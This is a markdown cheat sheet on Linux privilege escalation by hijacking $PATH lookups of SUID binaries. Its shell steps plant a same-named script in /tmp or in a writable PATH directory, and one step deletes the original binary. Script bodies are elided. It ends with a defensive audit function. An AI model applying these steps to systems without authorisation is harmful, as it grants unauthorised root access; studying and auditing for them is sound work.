# $PATH

### $PATH environment variable

```bash
$ echo $PATH
...
```

### Possible exploitable scenarios

1. A binary with the ***SUID*** bit set (`/usr/bin/bin-with-suid`) is found to execute another program by bare name, and that program is not found anywhere in `$PATH`

Assume the named script that is executed is `test-bin`

```bash
$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/bin-with-suid

$ /usr/bin/bin-with-suid
# error message indicating that test-bin is executed, but not found
sh: 1: test-bin: not found 
```

a) The `$PATH` environment variable can be edited ***ONLY***

b) Write permission to a directory already listed in the `$PATH` environment variable ***ONLY***

**Scenario a)**

```bash
$ echo $PATH
/usr/local/sbin:/usr/local/bin ...

$ export PATH=/tmp:$PATH 

$ echo $PATH
/tmp:/usr/local/sbin:/usr/local/bin ...

$ cd /tmp
$ nano test-bin
#!/...
...

$ /usr/bin/bin-with-suid
... executes /tmp/test-bin with ROOT privileges

```

**Scenario b)**

```bash
$ echo $PATH
/usr/local/sbin:/usr/local/bin ...

$ find / -writable 2>/dev/null
...
/usr/local/bin
...

$ cd /usr/local/bin
$ nano test-bin
#!/...
...

$ /usr/bin/bin-with-suid
... executes /usr/local/bin/test-bin with ROOT privileges

```

2. A binary with the ***SUID*** bit set (`/usr/bin/bin-with-suid`) is found to execute another program by bare name, and that program does exist in `$PATH`

Assume the named script that is executed is `test-bin` (present in `/usr/local/bin/`)

a) The `$PATH` environment variable can be edited ***ONLY***

b) Write permission to a directory listed in the `$PATH` environment variable ***ONLY***

**Scenario a)**

Prepend a writable directory such as `/tmp` to the `$PATH` environment variable, and create a script in that directory with the same name as the program the SUID binary executes. Because the new directory is searched first, the SUID binary runs the created script with `root` privileges.

```bash
$ export PATH=/tmp:$PATH 

$ cd /tmp
$ nano test-bin
#!/...
...

$ /usr/bin/bin-with-suid
... executes /tmp/test-bin with ROOT privileges
```

**Scenario b)**

***There are 2 further possible scenarios***

1. The directory we have write permission for appears before the directory where the named script is found. This lets us make the `SUID` binary execute a script defined by us instead, because the shell resolves a bare command name by searching the directories listed in `$PATH` from **left to right** and uses the first match

Assume that we have write permission for the folder `/usr/local/sbin`, and this path appears to the left of the value `/usr/local/bin` (the path of the original script) in `$PATH`

```bash
$ echo $PATH
/usr/local/sbin:/usr/local/bin ...

$ cd /usr/local/sbin

$ find / -name test-bin 2>/dev/null
/usr/local/bin/test-bin

$ nano test-bin
#!...
...

$ /usr/bin/bin-with-suid
# notice that the path is /usr/local/sbin, and NOT /usr/local/bin
... executes /usr/local/sbin/test-bin with ROOT privileges
```

2. We have write permissions for the actual path of the named script

```bash
$ ls -l /usr/local | grep bin
drwxrwxrwx 2 root   root   xxxx xxx  x ... bin
...

$ cd /usr/local/bin

$ rm test-bin

$ nano test-bin
#!...
...

$ /usr/bin/bin-with-suid
... executes /usr/local/bin/test-bin defined by yourself - with ROOT privileges
```
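
A defender's check for the left-to-right lookup order relied on in scenario 2.b, added here as an example and not part of the original notes: it resolves a bare command name over a PATH list the way the shell does and flags every writable directory searched before the real binary. The function names `path_shadow_audit` and `demo_shadowed_layout` and the sample layout are my own; run it as the unprivileged user whose `$PATH` you are auditing, since as root every directory tests writable.

```shell
#!/bin/sh
# Added example (not from the original notes). Resolves NAME left to right
# over a PATH-style list and reports each directory that is searched BEFORE
# the match and is writable by the current user: a same-named file dropped
# there would shadow the real binary for any process using that PATH,
# including a SUID helper that calls the program by bare name.
#
# path_shadow_audit NAME [PATHLIST]   (PATHLIST defaults to $PATH)
#   stdout: "resolved=<path>" and one "writable_before=<dir>" per risky dir
#   exit:   0 no risky dir, 1 at least one risky dir, 2 NAME not found
path_shadow_audit() {
    _name=$1
    _list=${2:-$PATH}
    _hit=""
    _rc=0
    _oldifs=$IFS
    IFS=:
    for _dir in $_list; do
        if [ -z "$_dir" ]; then _dir=.; fi   # empty entry means the current directory
        if [ -z "$_hit" ]; then
            if [ -f "$_dir/$_name" ] && [ -x "$_dir/$_name" ]; then
                _hit=$_dir/$_name                # first match wins, as in the shell
                printf 'resolved=%s\n' "$_hit"
            elif [ -w "$_dir" ]; then
                printf 'writable_before=%s\n' "$_dir"
                _rc=1
            fi
        fi
    done
    IFS=$_oldifs
    if [ -z "$_hit" ]; then _rc=2; fi
    return $_rc
}

# Constructed sample layout (hypothetical, built under mktemp): a writable
# "sbin" listed before the "bin" that really holds test-bin, mirroring
# scenario 2.b.1 above. Returns the audit's exit code (1: shadowing possible).
demo_shadowed_layout() {
    _tmp=$(mktemp -d)
    mkdir -p "$_tmp/sbin" "$_tmp/bin"
    printf '#!/bin/sh\necho real test-bin\n' > "$_tmp/bin/test-bin"
    chmod 755 "$_tmp/bin/test-bin"
    path_shadow_audit test-bin "$_tmp/sbin:$_tmp/bin"
    _r=$?
    rm -rf "$_tmp"
    return $_r
}
```

To audit a real system, call `path_shadow_audit test-bin` with no second argument so the current `$PATH` is used, and treat any `writable_before=` line as a directory to fix permissions on.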
